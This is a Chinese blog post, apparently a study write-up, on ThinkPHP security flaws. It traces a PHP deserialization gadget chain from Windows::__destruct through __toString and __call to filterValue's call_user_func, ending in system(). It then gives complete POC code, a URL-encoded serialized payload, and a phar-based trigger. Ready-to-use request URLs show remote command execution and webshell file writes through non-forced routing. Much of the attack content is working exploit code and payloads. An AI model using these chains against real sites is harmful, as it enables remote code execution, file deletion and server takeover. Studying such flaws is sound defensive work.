ThinkPHP反序列化漏洞

已于 2023-05-19 00:02:06 修改
阅读量536 收藏 3
点赞数 2
文章标签: php 开发语言
于 2023-05-18 18:37:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_77642110/article/details/130752885
版权

一、任意文件删除

搜索__destruct魔术方法,找到四个,能利用的只有Windows.php中的魔术方法

public function __destruct()
    {
        $this->close();
        $this->removeFiles();
    }

 追踪removeFiles()

private function removeFiles()
    {
        foreach ($this->files as $filename) {
            if (file_exists($filename)) {
                @unlink($filename);
            }
        }
        $this->files = [];
    }

发现是一个删除文件的方法,并且参数可控,存在删除任意文件漏洞

POC:

<?php

namespace think\process\pipes;

class Pipes{

}

class Windows extends Pipes{
    private $files = ['/opt/lampp/htdocs/security/upload/shell.php'];
}

$file = new Windows();
echo urlencode(serialize($file));

二、反序列化漏洞

1、搜索关键函数destruct与wakeup两个反序列化一定会触发的魔术方法,wakeup需要进行反序列化时调用,所以先不考虑,搜索destruct,一共四个结果,而能利用的只有Windows.php

 继续追踪close(),发现没有利用点,返回来追踪removeFiles(),发现是删除文件的函数,但是file_exists接受的参数是一个字符串,所以查找__toString魔术方法,看看能不能触发,发现一共四处定义了该魔术方法

Paginator.php:

Collection.php:

input.php:

Conversion.php:

但可控点只有三处,排除input.php,剩下的三个继续追踪,Paginator.php追踪后没有发现可利用点,排除,继续追踪Collection.php发现也没有可利用点(至于为什么没有可利用点慢慢探究,锻炼自己的基本功,这里不做详细介绍)所以只剩Conversion.php

toJson->toArray,前面的没有可控点,直接来到下面,代码如下:

if (!empty($this->append)) {
            foreach ($this->append as $key => $name) {
                if (is_array($name)) {
                    // 追加关联对象属性
                    $relation = $this->getRelation($key);
                    if (!$relation) {
                        $relation = $this->getAttr($key);
                        $relation->visible($name);
                    }

                    $item[$key] = $relation->append($name)->toArray();

append为可控点,往下探查是否有利用点,追踪getRelation只是简单返回值,往下走,追踪getAttr,追踪getData,两条路有可控点:

public function getData($name = null)
    {
        if (is_null($name)) {
            return $this->data;
        } elseif (array_key_exists($name, $this->data)) {     # 可控点一
            return $this->data[$name];
        } elseif (array_key_exists($name, $this->relation)) {	# 可控点二
            return $this->relation[$name];
        } else {
            throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);
        }
    }

经过分析,发现如果走下面可控点二的话,$this-relation就存在值,如果$relation不为空带入到toArray里面,if (!$relation)进行判断,则会跳过此处,存在逻辑矛盾,所以只剩第一个可控点,继续返回到toArray

$relation->visible($name);

追踪visible发现没有利用点,到这里路段了,回到toArray,是否能通过触发call来继续,所以继续搜索call,搜索出很多结果,但是都是写死了的,没有可控点,只有一处存在可利用的点

public function __call($method, $args)
    {
        if (array_key_exists($method, $this->hook)) {
            array_unshift($args, $this);
            return call_user_func_array($this->hook[$method], $args);
        } else {
            throw new Exception('method not exists:' . static::class . '->' . $method);
        }
    }

hook[$method]与$args都是可利用点,有希望,试图将hook[$method]给定system,$args给定ifconfig,不出意外出意外了,array_unshift函数将$this强行插入到ifconfig前面变成[$this, 'ifconfig'],路走死了?后面的参数不可控,那就在前面做手脚,让前面变成一个数组,call_user_func_array函数调用函数,也可以调用某个类里面的方法,所以我们继续搜索call_user_func_array或call_user_func,发现filterValue方法中

foreach ($filters as $filter) {
            if (is_callable($filter)) {
                // 调用函数或者方法过滤
                $value = call_user_func($filter, $value);

$filter, $value两个参数可控,先追踪$filter,来自于filterValue中$filters参数的遍历,所以继续搜索哪里在调用filterValue,总有一个传参的地方,在cookie与input方法中都有可利用点,但是再开始的call_user_func($filter, $value);中,$value来源于filterValue中的&$value,而cookie方法中调用filterValue时,传入的参数为$data,所以最终value的值来源于data,而在cookie方法中data不可控,所以排除了,很多人这里没想明白,我们接下来看input方法中的调用,还是继续探究$filter的值来源

$filter = $this->getFilter($filter, $default);

继续追踪getFilter

protected function getFilter($filter, $default)
    {
        if (is_null($filter)) {
            $filter = [];
        } else {
            $filter = $filter ?: $this->filter;
            if (is_string($filter) && false === strpos($filter, '/')) {
                $filter = explode(',', $filter);
            } else {
                $filter = (array) $filter;
            }
        }

        $filter[] = $default;

        return $filter;
    }

发现可控点$this->filter,但看注意后面$filter进行了数组转换,因为我们返回到filterValue的参数时必须为一个数组,才能进行遍历,以至于往下走,所以这里我们不要将filter给定一个数组,给定一个字符串类型就行,代码自己帮我们转为数组,$flter搞定了,接来解决$value,value来源于filterValue的第一个参数,老规矩,查找调用filterValue得地方,开始分析过了,value的值来源于input与cookie中的data,而cookie中的data不可控,所以继续分析input,发现data来源于参数data=[],那继续查找调用input的地方,有很多,但是不是每条都用,需分析逻辑上是否存在矛盾,这里就只拿一条举例,感兴趣的可以研究其他为什么走不通,这里拿route中调用input举例,

public function route($name = '', $default = null, $filter = '')
    {
        if (is_array($name)) {
            $this->param        = [];
            return $this->route = array_merge($this->route, $name);
        }

        return $this->input($this->route, $name, $default, $filter);
    }

这是input中的第一个判断条件,如果name为false,则直接结束,所以不能为false,而route中的name=' ',那就继续追踪调用route的地方,发现直接传入的参数为false,其他很多结果也是类似的,参数不可控导致我们不能够走input,直接return了

{
        if (false === $name) {
            // 获取原始数据
            return $data;
        }

只有在param中,可以找到控制name参数值的地方,查找param调用的地方,找到isAjax与isPjax,其实这两处都可以利用,这里就拿isAjax举例:

public function isAjax($ajax = false)
    {
        $value  = $this->server('HTTP_X_REQUESTED_WITH', '', 'strtolower');
        $result = ('xmlhttprequest' == $value) ? true : false;

        if (true === $ajax) {
            return $result;
        } else {
            // return $this->param($this->config->get('var_ajax')) ? true : $result;
            $result = $this->param($this->config['var_ajax']) ? true : $result;
            // $this->mergeParam = false;
            return $result;
        }
    }

这里的参数可控,$this->config['var_ajax']不能为false,所以我们给config['var_ajax']定义为空字符串,这样即可调用param,也不会直接return,为什么是空字符串,别急,肯定有道理的,下面是input中的一个判断条件,如果name为空行字符串,则条件为false,如果不为空字符串,则直接在后面return了,这也就是为什么要为空字符串,而name来源于$this->config['var_ajax'],所以我们要让$this->config['var_ajax']为空字符串

if ('' != $name) {
            // 解析name
            if (strpos($name, '/')) {
                list($name, $type) = explode('/', $name);
            } else {
                $type = 's';
            }

到此分析完毕,来梳理一下,查找destruct,追踪到file_exists接收字符串参数,所以继续查找toString,来到Conversion.php中toJson->toArray,发现调用visible,利用call特性,查找call,由于array_unshift($args, $this);导致无法继续,想到控制前面的参数为一个数组,继续查找同类中的其他call_user_func与call_user_func_array,找到filterValue中有利用点,再继续追踪两个参数,input->param,最总追踪到isAjax中调用param

下面是反序列化的POC

namespace think;

class Request {
    protected $param = [];
    protected $hook = [];
    protected $filter;
    protected $config = [];
    function __construct () {
        $this->filter = 'system';
        $this->param = ['ip addr'];
        $this->hook = ['visible'=>[$this,'isAjax']];
        $this->config = ['var_ajax'=>''];
    }
}


abstract class Model {
    protected $append = [];
    private $data = [];

    function __construct () {
        $this->append = ['xiatian'=>['xia']];
        $this->data = ['xiatian'=>new Request()];
    }
}


namespace think\model;

use think\Model;

class Pivot extends Model
{}

namespace think\process\pipes;
use think\model\Pivot;
abstract class Pipes{}
class Windows extends Pipes{
    private $files = ['/opt/lampp/htdocs/security/upload/shell.php'];

    function __construct () {
        $this->files = [new Pivot()];
    }
}

$w = new Windows();
echo urlencode(serialize($w));

payload:

O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A7%3A%22xiatian%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22xia%22%3B%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A7%3A%22xiatian%22%3BO%3A13%3A%22think%5CRequest%22%3A4%3A%7Bs%3A8%3A%22%00%2A%00param%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22ip+addr%22%3B%7Ds%3A7%3A%22%00%2A%00hook%22%3Ba%3A1%3A%7Bs%3A7%3A%22visible%22%3Ba%3A2%3A%7Bi%3A0%3Br%3A8%3Bi%3A1%3Bs%3A6%3A%22isAjax%22%3B%7D%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A1%3A%7Bs%3A8%3A%22var_ajax%22%3Bs%3A0%3A%22%22%3B%7D%7D%7D%7D%7D%7D

三、非强制路由漏洞

1、执行任意命令

http://192.168.101.51/tp5/public/index.php?s=index/\think\Request/input&filter=system&data=ifconfig

2、上传任意文件

http://192.168.101.51/tp6/public/index.php?s=index/\think\template\driver\file/write&cacheFile=/opt/lampp/htdocs/security/upload/shell.php&content=<?php phpinfo();?>

 3、接着上面的反序列化漏洞,存在漏洞,但却没有接口,接下来讲解接口,destruct方法在反序列化后自动调用,但代码中并没有反序列化的代码执行,则想到另一种办法,利用phar反序列化,触发phar反序列化的函数file_exists,file_put_contents,file_get_contents等等对文件操作的函数,在文件操作时,操作完后会调用destruct魔法函数,我们上面的起点就是来自于Windows.php中的__destruct,所以行办法触发他,则查找操作文件类的函数,其实有很多地方,我这里使用的时File.php中的check函数,因为这里直接传参执行,没有多余的操作,省事,那我们就需要构造一个phar序列化的POC,上面POC基础上加上这段POC来达到一个完整的调用链,利用内置的phar实例化一个对象,创建一个phar文件,把这个文件作为参数传入check,就触发了反序列化,进而达到漏洞触发

@unlink('test.phar');	// 删除文件
$phar = new Phar("test.phar");
$phar->startBuffering();  // 开始缓存
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$x = new Windows();
$phar->setMetadata($x);   // 会自动执行序列化操作
$phar->addFromString('test.txt', 'test');	// 在phar文件中创建一个文档用来装内容
$phar->stopBuffering();		// 结束缓存

将这段POC与上面的POC结合,这就一条完整的POC

namespace think;

class Request {
    protected $param = [];
    protected $hook = [];
    protected $filter;
    protected $config = [];
    function __construct () {
        $this->filter = 'system';
        $this->param = ['ip addr'];
        $this->hook = ['visible'=>[$this,'isAjax']];
        $this->config = ['var_ajax'=>''];
    }
}


abstract class Model {
    protected $append = [];
    private $data = [];

    function __construct () {
        $this->append = ['xiatian'=>['xia']];
        $this->data = ['xiatian'=>new Request()];
    }
}


namespace think\model;

use think\Model;

class Pivot extends Model
{}

namespace think\process\pipes;
use Phar;
use think\model\Pivot;
class Pipes{}
class Windows extends Pipes{
    private $files = ['/opt/lampp/htdocs/security/upload/test.php'];

    function __construct () {
        $this->files = [new Pivot()];
    }
}


@unlink('test.phar');
$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$x = new Windows();
$phar->setMetadata($x);   // 会自动执行序列化操作
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();

POC使用:

http://192.168.101.51/tp6/public/index.php?s=index/\think\template\driver\File/check&cacheFile=phar:///opt/lampp/htdocs/security/test.phar/test.txt&cacheTime=1

s:PATHINFO变量名

index模块,文件的路径,然后是方法名,在然后是参数

如果不成功,则是权限不够,导致提前结束代码,无法执行到这一步,直接将该项目,比如我的是tp5,执行下面命令

chmod 777 tp5 

关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ThinkPHP 5.0.24反序列化分析
RestoreJustice的博客
04-12 895
调试环境:phpstudy+phpstorm+xdebugphp版本:php7.3.4nts源码:Thinkphp5.0.24注意:源码下载地址:https://www.thinkphp.cn/donate/download/id/1279.html 三、构建利用点 控制器文件(Controller) ThinkPHP的控制器是一个类,接收用户的输入并调用模型和视图去完成用户的需求,控制器层由核心控制器和业务控制器组成,核心控制器由系统内部的App类完成,负责应用(包括模块、控制器和操作)的调度控制,包
TP 5.0.24反序列化漏洞分析
goddemon
10-20 6146
很久没发过文章了,最近在研究审计链条相关的东西,codeql,ast,以及一些java的东西很多东西还是没学明白就先不写出来丢人了,写这篇tp的原因呢虽然这个漏洞的分析文章蛮多了,但是还是跟着看了下,一方面是因为以前对pop链挖掘一直学的懵懵懂懂的 ctf的一些pop链能出,但是到了框架里面自己就是挖不出来,所以就想着自己挖下tp反序列化的链子来看看,另一方面是想思考学习下php挖掘利用ast手法去该怎么入手(虽然后面这个问题还没解决),所以就有了这篇文章。
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,网络安全开发工程师面试题
最新发布
2401_83947105的博客
04-14 938
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
Thinkphp5.1反序列化漏洞复现加代码调式
MachineGunJoe666
04-27 194
代码调试环境问题 一直不行就是composer上的默认php版本和你phpstrom上面的版本对不上,要先在你composer下来的目录下找composer.json文件修改版本(可能大概而已) 因为我是用自己的phpstudy来搭建composer下来的源码的,没用think run 。。。 环境搭建并访问成功 (自行百度一下composer如何安装) 版本错了再来 Packagist找相应的版本下载信息 不太行这样下载只会下载最新版本好像,继续 成功搭建好 复现
学习笔记-TP5反序列化利用
人饭子的博客
11-09 529
TP5反序列化利用链 本文以第二人称视角重点谈谈给你了反序列化的利用链你该怎么写exp。 文章很长,当故事看即可。 漏洞版本为 ThinkPHP 5.1.X 下图是Mochazz 大佬画的非常优雅的一张调用链图 10 如果说之前了解过PHP反序列(重点知识)的基础知识(入门知识),那么一眼就能明白这条链的起点-跳板-终点是什么。 以析构函数为起点开始调用;以__toString方法为跳板寻...
thinkphp 6.x 任意文件写入漏洞
Aiwin的博客
08-06 3802
thinkphp 6.x 任意文件写入漏洞
ThinkPHP3.2.3反序列化链子分析.doc
07-08
这篇文章主要探讨了ThinkPHP3.2.3框架中的一个安全问题——反序列化漏洞。由于该版本已不再维护,本文旨在重现和理解这个特定版本中的反序列化链子,以便于安全研究和教育。 反序列化漏洞通常发生在对象被反序列...
tp5漏洞利用工具.zip
01-03
标题中的“tp5漏洞利用工具.zip”指的是一个包含利用ThinkPHP5框架中安全漏洞的工具包,这个压缩包主要用于测试和展示ThinkPHP5代码执行漏洞的利用方式。描述提到,这个工具包含了两种方法,用于在目标系统上检测并...
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
ThinkPHP v6.0.7 eval反序列化利用链1
08-03
首先,利用此漏洞的前提条件是存在一个完全可控的反序列化点。这意味着攻击者能够控制输入的数据,使其在被反序列化时触发特定的行为。在给定的示例中,修改入口文件`app/controller/Index.php`来创建这样一个可控的...
ThinkPHP漏洞大全
热门推荐
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3779
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
thinkphp5.0.24反序列化
qq_62989306的博客
09-18 1982
此时我们需要寻找能写webshell的__call()方法,在这里选择的是think\console\Output类里的$method是getAttr,且$this->styles是可控的。只要在styles数组里加一个getAttr即可。所以可以顺利进入第一个if。array_unshift() 函数用于向数组插入新元素,新数组的值将被插入到数组的开头。里的参数都是可控的,所以往下走没有影响。call_user_func_array()是回调函数,可以将把一个数组参数作为回调函数的参数。
php unserialize反序列化报错问题
huihuangjiuai的专栏
10-30 2584
一开始在本地测试的时候,取序列化值得时候,直接是unserialize(数组)["名称"],这样使用,没问题,也不报错。后来传到服务器上以后(tp框架),莫名其妙报错,也没有具体错误原因。挨个方法调试以后,终于找到就是unserialize的原因。 后来用变量接受一下反序列化的数组,然后用变量["名称"]的方式调用,一点问题没有。不知道这是不是一个unserialize的漏洞。希望能给大家一个提
Thinkphp5.0 反序列化漏洞复现
feng的博客
03-11 2037
前言 环境创建: composer create-project topthink/think=5.0.14 thinkphp5.0.14 "require": { "php": ">=5.4.0", "topthink/framework": "5.0.14" }, composer update
ThinkPHP系统变量,常量,序列化,反序列化,缓存
W1365966490的专栏
05-29 6388
变量的输出: 在模板中输出一个变量有两种形式:{$list.name} {$list[‘name’]} 在模板中可以使用系统变量,以$Think.开头    系统变量:(举例选几个)    获得服务器的IP地址:{$Think.server.SERVER_ADDR}    获得外部访问的IP地址:{$Think.server.REMOTE_ADDR}    获得服务器的名称:{$Thi
从红帽杯题目学习thinkphp 5.1反序列化利用链
一个安全研究员
02-17 1374
师傅们真的tql
PHP中的序列化与反序列化
sinat_35161044的博客
08-20 2028
今天在学习面向对象时,里边的一个两个魔术方法__sleep()和__wake()让我一开始有点困惑,这两个方法分别是让类序列化和反序列化时使用的,因为看的是视频,老师说的很笼统,就自己在网上查了一下,下边是我总结的内容: 1.序列化是将对象通过一系列的操作转化为字符串的过程。 2.什么时候需要序列化? 1)对象在网络上传输时 2)对象保存到文件中时 3.序列化与__sleep()魔法方法...
ThinkPHP6反序列化漏洞核心原理
04-11
ThinkPHP6反序列化漏洞的核心原理是由于ThinkPHP6框架在处理反序列化时存在安全漏洞,攻击者可以构造恶意的序列化数据,通过该漏洞执行任意代码。具体原理如下: 1. ThinkPHP6框架使用了PHP的unserialize()函数来反序列化数据。攻击者可以构造恶意的序列化数据,其中包含可执行的代码。 2. 攻击者将恶意序列化数据发送给应用程序,应用程序在反序列化时会调用unserialize()函数。 3. unserialize()函数会将序列化数据还原为PHP对象。在这个过程中,如果恶意序列化数据中包含可执行的代码,那么这些代码就会被执行。 4. 攻击者可以通过构造恶意的序列化数据来执行任意代码,例如执行系统命令、读取敏感文件等。 为了防止这种漏洞的发生,开发者应该及时更新ThinkPHP6框架版本,以修复已知的安全漏洞。同时,也应该对用户输入进行严格的验证和过滤,避免恶意输入导致的安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值